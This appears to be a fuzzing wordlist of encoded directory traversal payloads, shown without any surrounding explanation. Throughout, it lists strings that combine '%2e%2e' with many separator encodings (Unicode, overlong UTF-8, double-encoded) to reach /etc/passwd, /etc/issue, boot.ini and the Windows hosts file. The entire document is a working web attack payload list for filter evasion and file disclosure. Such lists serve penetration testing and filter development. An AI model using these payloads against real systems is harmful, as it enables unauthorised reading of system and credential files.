-%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215passwd -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215issue -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215boot.ini -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215passwd -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215issue -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215boot.ini -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215passwd -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215issue -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215boot.ini -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e%2e%u2216etc%u2216passwd -%2e%2e%u2216etc%u2216issue -%2e%2e%u2216boot.ini -%2e%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e%2e%u2216%2e%2e%u2216etc%u2216passwd -%2e%2e%u2216%2e%2e%u2216etc%u2216issue -%2e%2e%u2216%2e%2e%u2216boot.ini -%2e%2e%u2216%2e%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216passwd -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216issue -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216boot.ini -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216passwd -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216issue -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216boot.ini -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216passwd -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216issue -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216boot.ini -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216passwd -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216etc%u2216issue -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216boot.ini -%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%2e%2e%uEFC8etc%uEFC8passwd -%2e%2e%uEFC8etc%uEFC8issue -%2e%2e%uEFC8boot.ini -%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8passwd -%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8issue -%2e%2e%uEFC8%2e%2e%uEFC8boot.ini -%2e%2e%uEFC8%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8passwd -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8issue -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8boot.ini -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8passwd -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8issue -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8boot.ini -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8passwd -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8issue -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8boot.ini -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8passwd -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8issue -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8boot.ini -%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%2e%2e%uF025etc%uF025passwd -%2e%2e%uF025etc%uF025issue -%2e%2e%uF025boot.ini -%2e%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e%2e%uF025%2e%2e%uF025etc%uF025passwd -%2e%2e%uF025%2e%2e%uF025etc%uF025issue -%2e%2e%uF025%2e%2e%uF025boot.ini -%2e%2e%uF025%2e%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025passwd -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025issue -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025boot.ini -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025passwd -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025issue -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025boot.ini -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025passwd -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025issue -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025boot.ini -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025passwd -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025etc%uF025issue -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025boot.ini -%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025%2e%2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%2e%2e%%32%%66etc%%32%%66passwd -%2e%2e%%32%%66etc%%32%%66issue -%2e%2e%%32%%66boot.ini -%2e%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66passwd -%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66issue -%2e%2e%%32%%66%2e%2e%%32%%66boot.ini -%2e%2e%%32%%66%2e%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66passwd -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66issue -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66boot.ini -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66passwd -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66issue -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66boot.ini -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66passwd -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66issue -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66boot.ini -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66passwd -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66etc%%32%%66issue -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66boot.ini -%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66%2e%2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%2e%2e%%35%%63etc%%35%%63passwd -%2e%2e%%35%%63etc%%35%%63issue -%2e%2e%%35%%63boot.ini -%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63passwd -%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63issue -%2e%2e%%35%%63%2e%2e%%35%%63boot.ini -%2e%2e%%35%%63%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63passwd -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63issue -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63boot.ini -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63passwd -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63issue -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63boot.ini -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63passwd -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63issue -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63boot.ini -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63passwd -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63etc%%35%%63issue -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63boot.ini -%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%2e%2e%e0%80%afetc%e0%80%afpasswd -%2e%2e%e0%80%afetc%e0%80%afissue -%2e%2e%e0%80%afboot.ini -%2e%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afpasswd -%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afissue -%2e%2e%e0%80%af%2e%2e%e0%80%afboot.ini -%2e%2e%e0%80%af%2e%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afpasswd -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afissue -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afboot.ini -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afpasswd -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afissue -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afboot.ini -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afpasswd -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afissue -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afboot.ini -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afpasswd -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afetc%e0%80%afissue -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afboot.ini -%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%2e%2e%25c1%259cetc%25c1%259cpasswd -%2e%2e%25c1%259cetc%25c1%259cissue -%2e%2e%25c1%259cboot.ini -%2e%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cpasswd -%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cissue -%2e%2e%25c1%259c%2e%2e%25c1%259cboot.ini -%2e%2e%25c1%259c%2e%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cpasswd -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cissue -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cboot.ini -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cpasswd -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cissue -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cboot.ini -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cpasswd -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cissue -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cboot.ini -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cpasswd -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cissue -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cboot.ini -%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259c%2e%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%2e%2e%25c0%25afetc%25c0%25afpasswd -%2e%2e%25c0%25afetc%25c0%25afissue -%2e%2e%25c0%25afboot.ini -%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afpasswd -%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afissue -%2e%2e%25c0%25af%2e%2e%25c0%25afboot.ini -%2e%2e%25c0%25af%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afpasswd -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afissue -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afboot.ini -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afpasswd -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afissue -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afboot.ini -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afpasswd -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afissue -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afboot.ini -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afpasswd -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afetc%25c0%25afissue -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afboot.ini -%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd -%2e%2e%f0%80%80%afetc%f0%80%80%afissue -%2e%2e%f0%80%80%afboot.ini -%2e%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afissue -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afboot.ini -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afissue -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afboot.ini -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afissue -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afboot.ini -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afissue -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afboot.ini -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afetc%f0%80%80%afissue -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afboot.ini -%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%af%2e%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e%2e%f8%80%80%80%afboot.ini -%2e%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afboot.ini -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afboot.ini -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afboot.ini -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd 